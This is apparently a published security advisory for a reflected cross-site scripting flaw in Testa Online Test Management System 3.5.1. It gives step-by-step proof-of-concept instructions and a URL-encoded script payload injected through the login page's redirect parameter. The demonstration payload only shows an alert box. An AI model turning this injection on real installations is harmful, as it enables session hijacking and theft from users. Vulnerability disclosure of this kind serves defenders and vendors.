Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.
e9867bdeeba70c36ee85639c18dbb98c4422fde1467af31cc0a26c7ec8e89a09# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux
# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.
# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.